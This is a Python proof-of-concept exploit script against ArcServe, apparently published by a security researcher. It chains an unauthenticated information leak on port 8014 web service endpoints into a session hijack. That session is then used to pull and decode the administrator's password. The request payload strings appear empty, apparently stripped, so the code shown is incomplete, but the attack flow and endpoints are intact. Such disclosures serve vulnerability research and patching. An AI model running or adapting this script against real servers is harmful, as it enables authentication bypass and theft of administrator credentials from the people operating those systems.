#!/usr/bin/env python3 # ArcServe Exploit by Juan Manuel Fernandez (@TheXC3LL) - MDSec import sys import requests import urllib3 import base64 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) adminname = "" def getUUID(ip): payload = '' req = requests.post('https://' + ip + ':8014/WebServiceImpl/services/FlashServiceImpl', data=payload, verify=False, allow_redirects=False) output = req.text global adminname adminname = output[output.find('') + 15:output.find('')] uuid = output[output.find('') + 14:output.find('')] print("\t[+] AdminName: "+ adminname) print("\t[+] AuthUUID: "+ uuid) return uuid def getSession(ip, uuid): payload = '' + uuid + '' req = requests.post('https://' + ip + ':8014/WebServiceImpl/services/VirtualStandbyServiceImpl', data=payload, verify=False, allow_redirects=False) output = req.text if req.status_code == 200: cookie = req.headers["Set-Cookie"] session = cookie[:cookie.find(";")] print("\t[+] Session: " + session) return session def validate(ip, session): payload = '' headers = {'Cookie': session} req = requests.post('https://' + ip + ':8014/WebServiceImpl/services/FlashServiceImpl', data=payload, headers=headers, verify=False, allow_redirects=False) if req.status_code == 500: print("[!] Failed. Session is invalid :(") else: print("[*] Session is valid") output = req.text print("\t[+] Admin: " + adminname) if output.find('') == -1: print("\t[-] No password returned") else: password = output[output.find('') + 14:output.find('')] try: password = base64.b64decode(password) except: try: password = base64.b64decode(password + "=") except: password = base64.b64decode(password + "==") password = password[0x80:] final = [] for x in password: final.append(str(x)) print("\t[+] Password: {" + ', '.join(final) + "}; // Paste it to the decrypter") print("\n\nHave a happy hacking! ^_^") if __name__ == '__main__': print("\t\t-=[ ArcServe Pwner by Juan Manuel Fernandez (@TheXC3LL) - MDSec]=-\n\n") if len(sys.argv) != 2: print("[!] Error! Syntax: ArcPwn.py ") exit(-1) target = sys.argv[1] print("[*] Triggering info leak") uuid = getUUID(target) print("[*] Getting a valid session") session = getSession(target, uuid) print("[*] Doing an authenticated request to validate if session is valid") validate(target, session)